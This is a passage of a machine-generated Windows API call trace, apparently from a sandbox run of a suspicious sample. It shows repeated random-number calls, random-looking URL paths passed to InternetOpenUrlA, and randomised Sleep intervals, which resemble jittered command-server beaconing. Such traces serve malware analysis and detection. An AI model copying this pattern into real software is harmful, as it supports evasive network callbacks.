returned 0x7ffc5bcc36b0 [0252.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.065] GetProcessHeap () returned 0x440000 [0252.065] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0252.065] lstrcpyA (in: lpString1=0x4741c0, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0252.065] lstrcatA (in: lpString1="\x81\x03", lpString2="/37gnPlpnn44hfmb8l7so/uWocrqnuY6Fn6m1wlNm1kIjXk9ogkjtsmhvssfci3264/" | out: lpString1="\x81\x03/37gnPlpnn44hfmb8l7so/uWocrqnuY6Fn6m1wlNm1kIjXk9ogkjtsmhvssfci3264/") returned="\x81\x03/37gnPlpnn44hfmb8l7so/uWocrqnuY6Fn6m1wlNm1kIjXk9ogkjtsmhvssfci3264/" [0252.066] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0252.066] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/37gnPlpnn44hfmb8l7so/uWocrqnuY6Fn6m1wlNm1kIjXk9ogkjtsmhvssfci3264/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0252.066] GetProcessHeap () returned 0x440000 [0252.066] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0252.066] GetProcessHeap () returned 0x440000 [0252.066] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b720 | out: hHeap=0x440000) returned 1 [0252.066] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0252.066] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0252.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0252.067] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0252.215] Sleep (dwMilliseconds=0x192e9) [0252.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0252.364] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.364] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.364] GetProcessHeap () returned 0x440000 [0252.364] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0252.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0252.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.365] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b267, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x3a1b267) returned 0x0 [0252.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0252.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.392] GetProcessHeap () returned 0x440000 [0252.392] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0252.392] lstrcpyA (in: lpString1=0x4724e0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0252.392] lstrcatA (in: lpString1="\x04", lpString2="/C0hv33t7jv4kpct3r725s/hefZv7krPVniSySr0ahkm0ocdvkd1lsaOpfmu/" | out: lpString1="\x04/C0hv33t7jv4kpct3r725s/hefZv7krPVniSySr0ahkm0ocdvkd1lsaOpfmu/") returned="\x04/C0hv33t7jv4kpct3r725s/hefZv7krPVniSySr0ahkm0ocdvkd1lsaOpfmu/" [0252.392] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0252.393] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/C0hv33t7jv4kpct3r725s/hefZv7krPVniSySr0ahkm0ocdvkd1lsaOpfmu/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0252.393] GetProcessHeap () returned 0x440000 [0252.393] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0252.393] GetProcessHeap () returned 0x440000 [0252.393] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0252.393] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0252.393] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0252.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0252.394] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0252.394] Sleep (dwMilliseconds=0x143d2) [0252.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0252.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.574] GetProcessHeap () returned 0x440000 [0252.574] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02350 [0252.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0252.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02351, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a02351) returned 0x0 [0252.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0252.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0252.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0252.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0252.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 